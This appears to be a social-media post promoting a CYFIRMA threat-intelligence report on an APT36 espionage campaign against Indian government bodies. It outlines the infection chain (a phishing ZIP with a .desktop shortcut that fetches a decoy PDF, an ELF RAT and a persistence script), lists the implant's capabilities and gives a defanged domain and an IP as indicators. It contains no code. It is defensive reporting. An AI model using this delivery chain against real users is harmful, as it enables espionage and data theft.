APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors.This campaign showcases a major leap in the group’s technical sophistication — delivering custom Python-based ELF malware through weaponized .desktop shortcut files distributed via spear-phishing.📌 Key Highlights:The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.Once executed, the shortcut downloads:A decoy PDF to distract the userA malicious ELF payload (swcbc)A persistence-enabling shell script (swcbc.sh)The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36’s ongoing espionage operations.The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment   #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware   #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagementhttps://www.cyfirma.com/

Ver todos los episodios